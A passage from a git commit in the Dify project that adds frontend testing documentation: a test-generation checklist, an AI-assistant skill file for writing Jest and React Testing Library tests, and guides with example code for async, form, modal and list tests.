Merge remote-tracking branch 'origin/main' into feat/e2e-testing

This commit is contained in:
CodingOnStar 2025-12-16 10:04:19 +08:00
commit 3863894072
323 changed files with 25713 additions and 3590 deletions


@ -0,0 +1,205 @@
# Test Generation Checklist
Use this checklist when generating or reviewing tests for Dify frontend components.
## Pre-Generation
- [ ] Read the component source code completely
- [ ] Identify component type (component, hook, utility, page)
- [ ] Run `pnpm analyze-component <path>` if available
- [ ] Note complexity score and features detected
- [ ] Check for existing tests in the same directory
- [ ] **Identify ALL files in the directory** that need testing (not just index)
## Testing Strategy
### ⚠️ Incremental Workflow (CRITICAL for Multi-File)
- [ ] **NEVER generate all tests at once** - process one file at a time
- [ ] Order files by complexity: utilities → hooks → simple → complex → integration
- [ ] Create a todo list to track progress before starting
- [ ] For EACH file: write → run test → verify pass → then next
- [ ] **DO NOT proceed** to next file until current one passes
### Path-Level Coverage
- [ ] **Test ALL files** in the assigned directory/path
- [ ] List all components, hooks, utilities that need coverage
- [ ] Decide: single spec file (integration) or multiple spec files (unit)
### Complexity Assessment
- [ ] Run `pnpm analyze-component <path>` for complexity score
- [ ] **Complexity > 50**: Consider refactoring before testing
- [ ] **500+ lines**: Consider splitting before testing
- [ ] **30-50 complexity**: Use multiple describe blocks, organized structure
### Integration vs Mocking
- [ ] **DO NOT mock base components** (`Loading`, `Button`, `Tooltip`, etc.)
- [ ] Import real project components instead of mocking
- [ ] Only mock: API calls, complex context providers, third-party libs with side effects
- [ ] Prefer integration testing when using single spec file
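For the items above, a minimal sketch of the intended split — only the API layer is mocked, everything else renders for real (`DataPanel` and the empty-state text are illustrative):

```typescript
import { render, screen, waitFor } from '@testing-library/react'
// Hypothetical component under test; its base-component children render for real
import DataPanel from './data-panel'

// Only the API layer is mocked
jest.mock('@/service/api')

it('should render the empty state using real base components', async () => {
  render(<DataPanel />)
  await waitFor(() => {
    expect(screen.getByText(/no data/i)).toBeInTheDocument()
  })
})
```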
## Required Test Sections
### All Components MUST Have
- [ ] **Rendering tests** - Component renders without crashing
- [ ] **Props tests** - Required props, optional props, default values
- [ ] **Edge cases** - null, undefined, empty values, boundaries
### Conditional Sections (Add When Feature Present)
| Feature | Add Tests For |
|---------|---------------|
| `useState` | Initial state, transitions, cleanup |
| `useEffect` | Execution, dependencies, cleanup |
| Event handlers | onClick, onChange, onSubmit, keyboard |
| API calls | Loading, success, error states |
| Routing | Navigation, params, query strings |
| `useCallback`/`useMemo` | Referential equality |
| Context | Provider values, consumer behavior |
| Forms | Validation, submission, error display |
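Most rows in this table have examples in the guides; referential equality is the least obvious, so here is a hedged sketch using `renderHook` (the `useItemHandlers` hook is hypothetical):

```typescript
import { renderHook } from '@testing-library/react'
// Hypothetical hook that returns a useCallback-memoized handler
import { useItemHandlers } from './hooks'

it('should keep the same handler reference across re-renders', () => {
  const { result, rerender } = renderHook(() => useItemHandlers())
  const firstHandler = result.current.onSelect

  rerender()

  // With unchanged dependencies, useCallback should return the identical function
  expect(result.current.onSelect).toBe(firstHandler)
})
```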
## Code Quality Checklist
### Structure
- [ ] Uses `describe` blocks to group related tests
- [ ] Test names follow `should <behavior> when <condition>` pattern
- [ ] AAA pattern (Arrange-Act-Assert) is clear
- [ ] Comments explain complex test scenarios
### Mocks
- [ ] **DO NOT mock base components** (`@/app/components/base/*`)
- [ ] `jest.clearAllMocks()` in `beforeEach` (not `afterEach`)
- [ ] Shared mock state reset in `beforeEach`
- [ ] i18n mock returns keys (not empty strings)
- [ ] Router mocks match actual Next.js API
- [ ] Mocks reflect actual component conditional behavior
- [ ] Only mock: API services, complex context providers, third-party libs
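The i18n and reset items above correspond to this pattern (mirrors `guides/mocking.md`; the shared `mockOpenState` variable is illustrative and would be read by a `jest.mock` factory elsewhere in the spec):

```typescript
// i18n mock returns the key itself so assertions can match on translation keys
jest.mock('react-i18next', () => ({
  useTranslation: () => ({
    t: (key: string) => key,
  }),
}))

// Illustrative shared mock state, read by a jest.mock factory in the spec
let mockOpenState = false

beforeEach(() => {
  jest.clearAllMocks() // reset call history before, not after, each test
  mockOpenState = false // reset shared mock state
})
```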
### Queries
- [ ] Prefer semantic queries (`getByRole`, `getByLabelText`)
- [ ] Use `queryBy*` for absence assertions
- [ ] Use `findBy*` for async elements
- [ ] `getByTestId` only as last resort
### Async
- [ ] All async tests use `async/await`
- [ ] `waitFor` wraps async assertions
- [ ] Fake timers properly setup/teardown
- [ ] No floating promises
### TypeScript
- [ ] No `any` types without justification
- [ ] Mock data uses actual types from source
- [ ] Factory functions have proper return types
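A small sketch of a typed factory in that style (the `Doc` type and its fields are illustrative; see `guides/mocking.md` for the full factory pattern):

```typescript
import type { Doc } from '@/types' // illustrative type import

const createMockDoc = (overrides: Partial<Doc> = {}): Doc => ({
  id: 'doc-1',
  name: 'Test Document',
  wordCount: 0,
  ...overrides,
})

// Usage: only state what differs from the default
const renamedDoc = createMockDoc({ name: 'Renamed Document' })
```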
## Coverage Goals (Per File)
For the current file being tested:
- [ ] 100% function coverage
- [ ] 100% statement coverage
- [ ] >95% branch coverage
- [ ] >95% line coverage
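If the team wants Jest to enforce these numbers, a `coverageThreshold` block can express them. This is only a sketch of the Jest option, not the project's actual `jest.config.ts`:

```typescript
// jest.config.ts (sketch only; the project's real config may differ)
import type { Config } from 'jest'

const config: Config = {
  coverageThreshold: {
    global: {
      functions: 100,
      statements: 100,
      branches: 95,
      lines: 95,
    },
  },
}

export default config
```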
## Post-Generation (Per File)
**Run these checks after EACH test file, not just at the end:**
- [ ] Run `pnpm test -- path/to/file.spec.tsx` - **MUST PASS before next file**
- [ ] Fix any failures immediately
- [ ] Mark file as complete in todo list
- [ ] Only then proceed to next file
### After All Files Complete
- [ ] Run full directory test: `pnpm test -- path/to/directory/`
- [ ] Check coverage report: `pnpm test -- --coverage`
- [ ] Run `pnpm lint:fix` on all test files
- [ ] Run `pnpm type-check:tsgo`
## Common Issues to Watch
### False Positives
```typescript
// ❌ Mock doesn't match actual behavior
jest.mock('./Component', () => () => <div>Mocked</div>)
// ✅ Mock matches actual conditional logic
jest.mock('./Component', () => ({ isOpen }: any) =>
isOpen ? <div>Content</div> : null
)
```
### State Leakage
```typescript
// ❌ Shared state not reset
let mockState = false
jest.mock('./useHook', () => () => mockState)
// ✅ Reset in beforeEach
beforeEach(() => {
mockState = false
})
```
### Async Race Conditions
```typescript
// ❌ Not awaited
it('loads data', () => {
render(<Component />)
expect(screen.getByText('Data')).toBeInTheDocument()
})
// ✅ Properly awaited
it('loads data', async () => {
render(<Component />)
await waitFor(() => {
expect(screen.getByText('Data')).toBeInTheDocument()
})
})
```
### Missing Edge Cases
Always test these scenarios:
- `null` / `undefined` inputs
- Empty strings / arrays / objects
- Boundary values (0, -1, MAX_INT)
- Error states
- Loading states
- Disabled states
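These scenarios fit naturally into a `test.each` table; a minimal sketch (the component and expected empty-state text are illustrative):

```typescript
import { render, screen } from '@testing-library/react'
// `Component` stands in for whatever component is under test
import Component from './index'

test.each([
  { input: null, expected: /no data/i },
  { input: undefined, expected: /no data/i },
  { input: [], expected: /no data/i },
  { input: '', expected: /no data/i },
])('should handle edge case input: $input', ({ input, expected }) => {
  render(<Component data={input} />)
  expect(screen.getByText(expected)).toBeInTheDocument()
})
```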
## Quick Commands
```bash
# Run specific test
pnpm test -- path/to/file.spec.tsx
# Run with coverage
pnpm test -- --coverage path/to/file.spec.tsx
# Watch mode
pnpm test -- --watch path/to/file.spec.tsx
# Update snapshots (use sparingly)
pnpm test -- -u path/to/file.spec.tsx
# Analyze component
pnpm analyze-component path/to/component.tsx
# Review existing test
pnpm analyze-component path/to/component.tsx --review
```


@ -0,0 +1,320 @@
---
name: Dify Frontend Testing
description: Generate Jest + React Testing Library tests for Dify frontend components, hooks, and utilities. Triggers on testing, spec files, coverage, Jest, RTL, unit tests, integration tests, or write/review test requests.
---
# Dify Frontend Testing Skill
This skill enables Claude to generate high-quality, comprehensive frontend tests for the Dify project following established conventions and best practices.
> **⚠️ Authoritative Source**: This skill is derived from `web/testing/testing.md`. When in doubt, always refer to that document as the canonical specification.
## When to Apply This Skill
Apply this skill when the user:
- Asks to **write tests** for a component, hook, or utility
- Asks to **review existing tests** for completeness
- Mentions **Jest**, **React Testing Library**, **RTL**, or **spec files**
- Requests **test coverage** improvement
- Uses `pnpm analyze-component` output as context
- Mentions **testing**, **unit tests**, or **integration tests** for frontend code
- Wants to understand **testing patterns** in the Dify codebase
**Do NOT apply** when:
- User is asking about backend/API tests (Python/pytest)
- User is asking about E2E tests (Playwright/Cypress)
- User is only asking conceptual questions without code context
## Quick Reference
### Tech Stack
| Tool | Version | Purpose |
|------|---------|---------|
| Jest | 29.7 | Test runner |
| React Testing Library | 16.0 | Component testing |
| happy-dom | - | Test environment |
| nock | 14.0 | HTTP mocking |
| TypeScript | 5.x | Type safety |
### Key Commands
```bash
# Run all tests
pnpm test
# Watch mode
pnpm test -- --watch
# Run specific file
pnpm test -- path/to/file.spec.tsx
# Generate coverage report
pnpm test -- --coverage
# Analyze component complexity
pnpm analyze-component <path>
# Review existing test
pnpm analyze-component <path> --review
```
### File Naming
- Test files: `ComponentName.spec.tsx` (same directory as component)
- Integration tests: `web/__tests__/` directory
## Test Structure Template
```typescript
import { render, screen, fireEvent, waitFor } from '@testing-library/react'
import Component from './index'
// ✅ Import real project components (DO NOT mock these)
// import Loading from '@/app/components/base/loading'
// import { ChildComponent } from './child-component'
// ✅ Mock external dependencies only
jest.mock('@/service/api')
jest.mock('next/navigation', () => ({
useRouter: () => ({ push: jest.fn() }),
usePathname: () => '/test',
}))
// Shared state for mocks (if needed)
let mockSharedState = false
describe('ComponentName', () => {
beforeEach(() => {
jest.clearAllMocks() // ✅ Reset mocks BEFORE each test
mockSharedState = false // ✅ Reset shared state
})
// Rendering tests (REQUIRED)
describe('Rendering', () => {
it('should render without crashing', () => {
// Arrange
const props = { title: 'Test' }
// Act
render(<Component {...props} />)
// Assert
expect(screen.getByText('Test')).toBeInTheDocument()
})
})
// Props tests (REQUIRED)
describe('Props', () => {
it('should apply custom className', () => {
render(<Component className="custom" />)
expect(screen.getByRole('button')).toHaveClass('custom')
})
})
// User Interactions
describe('User Interactions', () => {
it('should handle click events', () => {
const handleClick = jest.fn()
render(<Component onClick={handleClick} />)
fireEvent.click(screen.getByRole('button'))
expect(handleClick).toHaveBeenCalledTimes(1)
})
})
// Edge Cases (REQUIRED)
describe('Edge Cases', () => {
it('should handle null data', () => {
render(<Component data={null} />)
expect(screen.getByText(/no data/i)).toBeInTheDocument()
})
it('should handle empty array', () => {
render(<Component items={[]} />)
expect(screen.getByText(/empty/i)).toBeInTheDocument()
})
})
})
```
## Testing Workflow (CRITICAL)
### ⚠️ Incremental Approach Required
**NEVER generate all test files at once.** For complex components or multi-file directories:
1. **Analyze & Plan**: List all files, order by complexity (simple → complex)
1. **Process ONE at a time**: Write test → Run test → Fix if needed → Next
1. **Verify before proceeding**: Do NOT continue to next file until current passes
```
For each file:
┌────────────────────────────────────────┐
│ 1. Write test │
│ 2. Run: pnpm test -- <file>.spec.tsx │
│ 3. PASS? → Mark complete, next file │
│ FAIL? → Fix first, then continue │
└────────────────────────────────────────┘
```
### Complexity-Based Order
Process in this order for multi-file testing:
1. 🟢 Utility functions (simplest)
1. 🟢 Custom hooks
1. 🟡 Simple components (presentational)
1. 🟡 Medium components (state, effects)
1. 🔴 Complex components (API, routing)
1. 🔴 Integration tests (index files - last)
### When to Refactor First
- **Complexity > 50**: Break into smaller pieces before testing
- **500+ lines**: Consider splitting before testing
- **Many dependencies**: Extract logic into hooks first
> 📖 See `guides/workflow.md` for complete workflow details and todo list format.
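Once logic is extracted into a hook, it can be tested in isolation with `renderHook` before tackling the host component. A hedged sketch (`useCounter` is an illustrative hook, not an existing Dify one):

```typescript
import { act, renderHook } from '@testing-library/react'
// Hypothetical hook extracted from a large component
import { useCounter } from './use-counter'

describe('useCounter', () => {
  it('should increment count when increment is called', () => {
    const { result } = renderHook(() => useCounter(0))

    act(() => {
      result.current.increment()
    })

    expect(result.current.count).toBe(1)
  })
})
```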
## Testing Strategy
### Path-Level Testing (Directory Testing)
When assigned to test a directory/path, test **ALL content** within that path:
- Test all components, hooks, utilities in the directory (not just `index` file)
- Use incremental approach: one file at a time, verify each before proceeding
- Goal: 100% coverage of ALL files in the directory
### Integration Testing First
**Prefer integration testing** when writing tests for a directory:
- ✅ **Import real project components** directly (including base components and siblings)
- ✅ **Only mock**: API services (`@/service/*`), `next/navigation`, complex context providers
- ❌ **DO NOT mock** base components (`@/app/components/base/*`)
- ❌ **DO NOT mock** sibling/child components in the same directory
> See [Test Structure Template](#test-structure-template) for correct import/mock patterns.
## Core Principles
### 1. AAA Pattern (Arrange-Act-Assert)
Every test should clearly separate:
- **Arrange**: Setup test data and render component
- **Act**: Perform user actions
- **Assert**: Verify expected outcomes
### 2. Black-Box Testing
- Test observable behavior, not implementation details
- Use semantic queries (getByRole, getByLabelText)
- Avoid testing internal state directly
- **Prefer pattern matching over hardcoded strings** in assertions:
```typescript
// ❌ Avoid: hardcoded text assertions
expect(screen.getByText('Loading...')).toBeInTheDocument()
// ✅ Better: role-based queries
expect(screen.getByRole('status')).toBeInTheDocument()
// ✅ Better: pattern matching
expect(screen.getByText(/loading/i)).toBeInTheDocument()
```
### 3. Single Behavior Per Test
Each test verifies ONE user-observable behavior:
```typescript
// ✅ Good: One behavior
it('should disable button when loading', () => {
render(<Button loading />)
expect(screen.getByRole('button')).toBeDisabled()
})
// ❌ Bad: Multiple behaviors
it('should handle loading state', () => {
render(<Button loading />)
expect(screen.getByRole('button')).toBeDisabled()
expect(screen.getByText('Loading...')).toBeInTheDocument()
expect(screen.getByRole('button')).toHaveClass('loading')
})
```
### 4. Semantic Naming
Use `should <behavior> when <condition>`:
```typescript
it('should show error message when validation fails')
it('should call onSubmit when form is valid')
it('should disable input when isReadOnly is true')
```
## Required Test Scenarios
### Always Required (All Components)
1. **Rendering**: Component renders without crashing
1. **Props**: Required props, optional props, default values
1. **Edge Cases**: null, undefined, empty values, boundary conditions
### Conditional (When Present)
| Feature | Test Focus |
|---------|-----------|
| `useState` | Initial state, transitions, cleanup |
| `useEffect` | Execution, dependencies, cleanup |
| Event handlers | All onClick, onChange, onSubmit, keyboard |
| API calls | Loading, success, error states |
| Routing | Navigation, params, query strings |
| `useCallback`/`useMemo` | Referential equality |
| Context | Provider values, consumer behavior |
| Forms | Validation, submission, error display |
## Coverage Goals (Per File)
For each test file generated, aim for:
- ✅ **100%** function coverage
- ✅ **100%** statement coverage
- ✅ **>95%** branch coverage
- ✅ **>95%** line coverage
> **Note**: For multi-file directories, process one file at a time with full coverage each. See `guides/workflow.md`.
## Detailed Guides
For more detailed information, refer to:
- `guides/workflow.md` - **Incremental testing workflow** (MUST READ for multi-file testing)
- `guides/mocking.md` - Mock patterns and best practices
- `guides/async-testing.md` - Async operations and API calls
- `guides/domain-components.md` - Workflow, Dataset, Configuration testing
- `guides/common-patterns.md` - Frequently used testing patterns
## Authoritative References
### Primary Specification (MUST follow)
- **`web/testing/testing.md`** - The canonical testing specification. This skill is derived from this document.
### Reference Examples in Codebase
- `web/utils/classnames.spec.ts` - Utility function tests
- `web/app/components/base/button/index.spec.tsx` - Component tests
- `web/__mocks__/provider-context.ts` - Mock factory example
### Project Configuration
- `web/jest.config.ts` - Jest configuration
- `web/jest.setup.ts` - Test environment setup
- `web/testing/analyze-component.js` - Component analysis tool


@ -0,0 +1,345 @@
# Async Testing Guide
## Core Async Patterns
### 1. waitFor - Wait for Condition
```typescript
import { render, screen, waitFor } from '@testing-library/react'
it('should load and display data', async () => {
render(<DataComponent />)
// Wait for element to appear
await waitFor(() => {
expect(screen.getByText('Loaded Data')).toBeInTheDocument()
})
})
it('should hide loading spinner after load', async () => {
render(<DataComponent />)
// Wait for element to disappear
await waitFor(() => {
expect(screen.queryByText('Loading...')).not.toBeInTheDocument()
})
})
```
### 2. findBy\* - Async Queries
```typescript
it('should show user name after fetch', async () => {
render(<UserProfile />)
// findBy returns a promise, auto-waits up to 1000ms
const userName = await screen.findByText('John Doe')
expect(userName).toBeInTheDocument()
// findByRole with options
const button = await screen.findByRole('button', { name: /submit/i })
expect(button).toBeEnabled()
})
```
### 3. userEvent for Async Interactions
```typescript
import userEvent from '@testing-library/user-event'
it('should submit form', async () => {
const user = userEvent.setup()
const onSubmit = jest.fn()
render(<Form onSubmit={onSubmit} />)
// userEvent methods are async
await user.type(screen.getByLabelText('Email'), 'test@example.com')
await user.click(screen.getByRole('button', { name: /submit/i }))
await waitFor(() => {
expect(onSubmit).toHaveBeenCalledWith({ email: 'test@example.com' })
})
})
```
## Fake Timers
### When to Use Fake Timers
- Testing components with `setTimeout`/`setInterval`
- Testing debounce/throttle behavior
- Testing animations or delayed transitions
- Testing polling or retry logic
### Basic Fake Timer Setup
```typescript
describe('Debounced Search', () => {
beforeEach(() => {
jest.useFakeTimers()
})
afterEach(() => {
jest.useRealTimers()
})
it('should debounce search input', async () => {
const onSearch = jest.fn()
render(<SearchInput onSearch={onSearch} debounceMs={300} />)
// Type in the input
fireEvent.change(screen.getByRole('textbox'), { target: { value: 'query' } })
// Search not called immediately
expect(onSearch).not.toHaveBeenCalled()
// Advance timers
jest.advanceTimersByTime(300)
// Now search is called
expect(onSearch).toHaveBeenCalledWith('query')
})
})
```
### Fake Timers with Async Code
```typescript
it('should retry on failure', async () => {
jest.useFakeTimers()
const fetchData = jest.fn()
.mockRejectedValueOnce(new Error('Network error'))
.mockResolvedValueOnce({ data: 'success' })
render(<RetryComponent fetchData={fetchData} retryDelayMs={1000} />)
// First call fails
await waitFor(() => {
expect(fetchData).toHaveBeenCalledTimes(1)
})
// Advance timer for retry
jest.advanceTimersByTime(1000)
// Second call succeeds
await waitFor(() => {
expect(fetchData).toHaveBeenCalledTimes(2)
expect(screen.getByText('success')).toBeInTheDocument()
})
jest.useRealTimers()
})
```
### Common Fake Timer Utilities
```typescript
// Run all pending timers
jest.runAllTimers()
// Run only pending timers (not new ones created during execution)
jest.runOnlyPendingTimers()
// Advance by specific time
jest.advanceTimersByTime(1000)
// Get current fake time
jest.now()
// Clear all timers
jest.clearAllTimers()
```
## API Testing Patterns
### Loading → Success → Error States
```typescript
describe('DataFetcher', () => {
beforeEach(() => {
jest.clearAllMocks()
})
it('should show loading state', () => {
mockedApi.fetchData.mockImplementation(() => new Promise(() => {})) // Never resolves
render(<DataFetcher />)
expect(screen.getByTestId('loading-spinner')).toBeInTheDocument()
})
it('should show data on success', async () => {
mockedApi.fetchData.mockResolvedValue({ items: ['Item 1', 'Item 2'] })
render(<DataFetcher />)
// Use findBy* for multiple async elements (better error messages than waitFor with multiple assertions)
const item1 = await screen.findByText('Item 1')
const item2 = await screen.findByText('Item 2')
expect(item1).toBeInTheDocument()
expect(item2).toBeInTheDocument()
expect(screen.queryByTestId('loading-spinner')).not.toBeInTheDocument()
})
it('should show error on failure', async () => {
mockedApi.fetchData.mockRejectedValue(new Error('Failed to fetch'))
render(<DataFetcher />)
await waitFor(() => {
expect(screen.getByText(/failed to fetch/i)).toBeInTheDocument()
})
})
it('should retry on error', async () => {
mockedApi.fetchData.mockRejectedValue(new Error('Network error'))
render(<DataFetcher />)
await waitFor(() => {
expect(screen.getByRole('button', { name: /retry/i })).toBeInTheDocument()
})
mockedApi.fetchData.mockResolvedValue({ items: ['Item 1'] })
fireEvent.click(screen.getByRole('button', { name: /retry/i }))
await waitFor(() => {
expect(screen.getByText('Item 1')).toBeInTheDocument()
})
})
})
```
### Testing Mutations
```typescript
it('should submit form and show success', async () => {
const user = userEvent.setup()
mockedApi.createItem.mockResolvedValue({ id: '1', name: 'New Item' })
render(<CreateItemForm />)
await user.type(screen.getByLabelText('Name'), 'New Item')
await user.click(screen.getByRole('button', { name: /create/i }))
// Button should be disabled during submission
expect(screen.getByRole('button', { name: /creating/i })).toBeDisabled()
await waitFor(() => {
expect(screen.getByText(/created successfully/i)).toBeInTheDocument()
})
expect(mockedApi.createItem).toHaveBeenCalledWith({ name: 'New Item' })
})
```
## useEffect Testing
### Testing Effect Execution
```typescript
it('should fetch data on mount', async () => {
const fetchData = jest.fn().mockResolvedValue({ data: 'test' })
render(<ComponentWithEffect fetchData={fetchData} />)
await waitFor(() => {
expect(fetchData).toHaveBeenCalledTimes(1)
})
})
```
### Testing Effect Dependencies
```typescript
it('should refetch when id changes', async () => {
const fetchData = jest.fn().mockResolvedValue({ data: 'test' })
const { rerender } = render(<ComponentWithEffect id="1" fetchData={fetchData} />)
await waitFor(() => {
expect(fetchData).toHaveBeenCalledWith('1')
})
rerender(<ComponentWithEffect id="2" fetchData={fetchData} />)
await waitFor(() => {
expect(fetchData).toHaveBeenCalledWith('2')
expect(fetchData).toHaveBeenCalledTimes(2)
})
})
```
### Testing Effect Cleanup
```typescript
it('should cleanup subscription on unmount', () => {
const subscribe = jest.fn()
const unsubscribe = jest.fn()
subscribe.mockReturnValue(unsubscribe)
const { unmount } = render(<SubscriptionComponent subscribe={subscribe} />)
expect(subscribe).toHaveBeenCalledTimes(1)
unmount()
expect(unsubscribe).toHaveBeenCalledTimes(1)
})
```
## Common Async Pitfalls
### ❌ Don't: Forget to await
```typescript
// Bad - test may pass even if assertion fails
it('should load data', () => {
render(<Component />)
waitFor(() => {
expect(screen.getByText('Data')).toBeInTheDocument()
})
})
// Good - properly awaited
it('should load data', async () => {
render(<Component />)
await waitFor(() => {
expect(screen.getByText('Data')).toBeInTheDocument()
})
})
```
### ❌ Don't: Use multiple assertions in single waitFor
```typescript
// Bad - if first assertion fails, won't know about second
await waitFor(() => {
expect(screen.getByText('Title')).toBeInTheDocument()
expect(screen.getByText('Description')).toBeInTheDocument()
})
// Good - separate waitFor or use findBy
const title = await screen.findByText('Title')
const description = await screen.findByText('Description')
expect(title).toBeInTheDocument()
expect(description).toBeInTheDocument()
```
### ❌ Don't: Mix fake timers with real async
```typescript
// Bad - fake timers don't work well with real Promises
jest.useFakeTimers()
await waitFor(() => {
expect(screen.getByText('Data')).toBeInTheDocument()
}) // May timeout!
// Good - use runAllTimers or advanceTimersByTime
jest.useFakeTimers()
render(<Component />)
jest.runAllTimers()
expect(screen.getByText('Data')).toBeInTheDocument()
```


@ -0,0 +1,449 @@
# Common Testing Patterns
## Query Priority
Use queries in this order (most to least preferred):
```typescript
// 1. getByRole - Most recommended (accessibility)
screen.getByRole('button', { name: /submit/i })
screen.getByRole('textbox', { name: /email/i })
screen.getByRole('heading', { level: 1 })
// 2. getByLabelText - Form fields
screen.getByLabelText('Email address')
screen.getByLabelText(/password/i)
// 3. getByPlaceholderText - When no label
screen.getByPlaceholderText('Search...')
// 4. getByText - Non-interactive elements
screen.getByText('Welcome to Dify')
screen.getByText(/loading/i)
// 5. getByDisplayValue - Current input value
screen.getByDisplayValue('current value')
// 6. getByAltText - Images
screen.getByAltText('Company logo')
// 7. getByTitle - Tooltip elements
screen.getByTitle('Close')
// 8. getByTestId - Last resort only!
screen.getByTestId('custom-element')
```
## Event Handling Patterns
### Click Events
```typescript
// Basic click
fireEvent.click(screen.getByRole('button'))
// With userEvent (preferred for realistic interaction)
const user = userEvent.setup()
await user.click(screen.getByRole('button'))
// Double click
await user.dblClick(screen.getByRole('button'))
// Right click
await user.pointer({ keys: '[MouseRight]', target: screen.getByRole('button') })
```
### Form Input
```typescript
const user = userEvent.setup()
// Type in input
await user.type(screen.getByRole('textbox'), 'Hello World')
// Clear and type
await user.clear(screen.getByRole('textbox'))
await user.type(screen.getByRole('textbox'), 'New value')
// Select option
await user.selectOptions(screen.getByRole('combobox'), 'option-value')
// Check checkbox
await user.click(screen.getByRole('checkbox'))
// Upload file
const file = new File(['content'], 'test.pdf', { type: 'application/pdf' })
await user.upload(screen.getByLabelText(/upload/i), file)
```
### Keyboard Events
```typescript
const user = userEvent.setup()
// Press Enter
await user.keyboard('{Enter}')
// Press Escape
await user.keyboard('{Escape}')
// Keyboard shortcut
await user.keyboard('{Control>}a{/Control}') // Ctrl+A
// Tab navigation
await user.tab()
// Arrow keys
await user.keyboard('{ArrowDown}')
await user.keyboard('{ArrowUp}')
```
## Component State Testing
### Testing State Transitions
```typescript
describe('Counter', () => {
it('should increment count', async () => {
const user = userEvent.setup()
render(<Counter initialCount={0} />)
// Initial state
expect(screen.getByText('Count: 0')).toBeInTheDocument()
// Trigger transition
await user.click(screen.getByRole('button', { name: /increment/i }))
// New state
expect(screen.getByText('Count: 1')).toBeInTheDocument()
})
})
```
### Testing Controlled Components
```typescript
describe('ControlledInput', () => {
it('should call onChange with new value', async () => {
const user = userEvent.setup()
const handleChange = jest.fn()
render(<ControlledInput value="" onChange={handleChange} />)
await user.type(screen.getByRole('textbox'), 'a')
expect(handleChange).toHaveBeenCalledWith('a')
})
it('should display controlled value', () => {
render(<ControlledInput value="controlled" onChange={jest.fn()} />)
expect(screen.getByRole('textbox')).toHaveValue('controlled')
})
})
```
## Conditional Rendering Testing
```typescript
describe('ConditionalComponent', () => {
it('should show loading state', () => {
render(<DataDisplay isLoading={true} data={null} />)
expect(screen.getByText(/loading/i)).toBeInTheDocument()
expect(screen.queryByTestId('data-content')).not.toBeInTheDocument()
})
it('should show error state', () => {
render(<DataDisplay isLoading={false} data={null} error="Failed to load" />)
expect(screen.getByText(/failed to load/i)).toBeInTheDocument()
})
it('should show data when loaded', () => {
render(<DataDisplay isLoading={false} data={{ name: 'Test' }} />)
expect(screen.getByText('Test')).toBeInTheDocument()
})
it('should show empty state when no data', () => {
render(<DataDisplay isLoading={false} data={[]} />)
expect(screen.getByText(/no data/i)).toBeInTheDocument()
})
})
```
## List Rendering Testing
```typescript
describe('ItemList', () => {
const items = [
{ id: '1', name: 'Item 1' },
{ id: '2', name: 'Item 2' },
{ id: '3', name: 'Item 3' },
]
it('should render all items', () => {
render(<ItemList items={items} />)
expect(screen.getAllByRole('listitem')).toHaveLength(3)
items.forEach(item => {
expect(screen.getByText(item.name)).toBeInTheDocument()
})
})
it('should handle item selection', async () => {
const user = userEvent.setup()
const onSelect = jest.fn()
render(<ItemList items={items} onSelect={onSelect} />)
await user.click(screen.getByText('Item 2'))
expect(onSelect).toHaveBeenCalledWith(items[1])
})
it('should handle empty list', () => {
render(<ItemList items={[]} />)
expect(screen.getByText(/no items/i)).toBeInTheDocument()
})
})
```
## Modal/Dialog Testing
```typescript
describe('Modal', () => {
it('should not render when closed', () => {
render(<Modal isOpen={false} onClose={jest.fn()} />)
expect(screen.queryByRole('dialog')).not.toBeInTheDocument()
})
it('should render when open', () => {
render(<Modal isOpen={true} onClose={jest.fn()} />)
expect(screen.getByRole('dialog')).toBeInTheDocument()
})
it('should call onClose when clicking overlay', async () => {
const user = userEvent.setup()
const handleClose = jest.fn()
render(<Modal isOpen={true} onClose={handleClose} />)
await user.click(screen.getByTestId('modal-overlay'))
expect(handleClose).toHaveBeenCalled()
})
it('should call onClose when pressing Escape', async () => {
const user = userEvent.setup()
const handleClose = jest.fn()
render(<Modal isOpen={true} onClose={handleClose} />)
await user.keyboard('{Escape}')
expect(handleClose).toHaveBeenCalled()
})
it('should trap focus inside modal', async () => {
const user = userEvent.setup()
render(
<Modal isOpen={true} onClose={jest.fn()}>
<button>First</button>
<button>Second</button>
</Modal>
)
// Focus should cycle within modal
await user.tab()
expect(screen.getByText('First')).toHaveFocus()
await user.tab()
expect(screen.getByText('Second')).toHaveFocus()
await user.tab()
expect(screen.getByText('First')).toHaveFocus() // Cycles back
})
})
```
## Form Testing
```typescript
describe('LoginForm', () => {
it('should submit valid form', async () => {
const user = userEvent.setup()
const onSubmit = jest.fn()
render(<LoginForm onSubmit={onSubmit} />)
await user.type(screen.getByLabelText(/email/i), 'test@example.com')
await user.type(screen.getByLabelText(/password/i), 'password123')
await user.click(screen.getByRole('button', { name: /sign in/i }))
expect(onSubmit).toHaveBeenCalledWith({
email: 'test@example.com',
password: 'password123',
})
})
it('should show validation errors', async () => {
const user = userEvent.setup()
render(<LoginForm onSubmit={jest.fn()} />)
// Submit empty form
await user.click(screen.getByRole('button', { name: /sign in/i }))
expect(screen.getByText(/email is required/i)).toBeInTheDocument()
expect(screen.getByText(/password is required/i)).toBeInTheDocument()
})
it('should validate email format', async () => {
const user = userEvent.setup()
render(<LoginForm onSubmit={jest.fn()} />)
await user.type(screen.getByLabelText(/email/i), 'invalid-email')
await user.click(screen.getByRole('button', { name: /sign in/i }))
expect(screen.getByText(/invalid email/i)).toBeInTheDocument()
})
it('should disable submit button while submitting', async () => {
const user = userEvent.setup()
const onSubmit = jest.fn(() => new Promise(resolve => setTimeout(resolve, 100)))
render(<LoginForm onSubmit={onSubmit} />)
await user.type(screen.getByLabelText(/email/i), 'test@example.com')
await user.type(screen.getByLabelText(/password/i), 'password123')
await user.click(screen.getByRole('button', { name: /sign in/i }))
expect(screen.getByRole('button', { name: /signing in/i })).toBeDisabled()
await waitFor(() => {
expect(screen.getByRole('button', { name: /sign in/i })).toBeEnabled()
})
})
})
```
## Data-Driven Tests with test.each
```typescript
describe('StatusBadge', () => {
test.each([
['success', 'bg-green-500'],
['warning', 'bg-yellow-500'],
['error', 'bg-red-500'],
['info', 'bg-blue-500'],
])('should apply correct class for %s status', (status, expectedClass) => {
render(<StatusBadge status={status} />)
expect(screen.getByTestId('status-badge')).toHaveClass(expectedClass)
})
test.each([
{ input: null, expected: 'Unknown' },
{ input: undefined, expected: 'Unknown' },
{ input: '', expected: 'Unknown' },
{ input: 'invalid', expected: 'Unknown' },
])('should show "Unknown" for invalid input: $input', ({ input, expected }) => {
render(<StatusBadge status={input} />)
expect(screen.getByText(expected)).toBeInTheDocument()
})
})
```
## Debugging Tips
```typescript
// Print entire DOM
screen.debug()
// Print specific element
screen.debug(screen.getByRole('button'))
